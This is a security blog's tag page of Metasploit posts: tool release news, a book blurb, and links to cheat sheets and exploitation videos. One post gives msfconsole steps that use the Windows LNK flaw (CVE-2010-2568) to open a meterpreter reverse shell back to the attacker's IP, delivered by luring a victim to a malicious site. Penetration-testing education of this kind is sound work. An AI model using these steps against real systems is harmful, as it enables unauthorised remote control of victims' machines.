Posts tagged metasploit


BackTrack 5 R1 released






BackTrack guys have Released a Updated Version of BackTrack 5 with Lot of new Tools and Updates.for more Information check out the Below Link.


Metasploit: A Penetration Tester’s Guide Book Comming Soon



Metasploit: A Penetration Tester’s Guide will teach you how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post exploitation modules and scripts

Add Video

Exploiting Windows LNK vulnerability (CVE-2010-2568)


Recently there has been detected a new 0 day exploit which takes advantage of Windows incorrectly parses shortcuts so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. this can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV.Recently metasploit have pushed the exploit to the msf module.still there is no patch relased for this vulnerability.
there are 2 ways to exploit this

1)keep these 2 files LNK file and the DLL in the USb stick and run on the victim machine
2)or trick the victim in accessing the maclicious site.
we will use 2 nd method .
3)svn update (update ur msf)
3)use windows/browser/ms10_xxx_windows_shell_lnk_execute
4)set payload windows/meterpreter/reverse_tcp
5)set LHOST (your ip)
6)set LPORT 1427 (any port)

chk out my video to accomplish the above method Exploiting Windows LNK vulnerability (CVE-2010-2568)

Metasploit Framework 3.4.1 Released


The Metasploit Project is proud to announce the release of the Metasploit Framework version 3.4.1. As always, you can get it from our downloads page,

Security Assessment and Pentest tools Cheat Sheets


Got from my old Bookmarks ,below are some useful Cheat Sheets ,let me know if u found any other cheat sheets i will update the post


Backtrack 4
misc tools
Metasploit Meterpreter

Oracle Security

SQl Injection

Microsoft SQL,Sybase,MySQL,Oracle,PostgreSQL,DB2,IngresBypass SQL Injection Filters
Packetlife Cheatsheets

Ed Skoudis’ Pentest Cheatsheets

Windows commandline tools
Netcat Cheat Sheet
Useful Attack Tools, Metasploit commands, HPing, FGDump

Reverse Engineering Malware Cheat Sheet

Security Archiecture Cheat Sheet for Internet Applications

CEH cheatsheets from Mindcert

Metasploit MeterpreterClient wiki


Detailed metasploit meterpreter core commands

kudos for bond for sharing this link

Exploitation Videos from Dino Dai Zovi


Found Interesting videos on Exploitation

Dino Dai Zovi’s Memory Corruption 101

Basic debugging for exploit development

Exploitation 102

Exploit mitigations, shellcoding, and Metasploit with Dino Dai Zovi.

Go to Top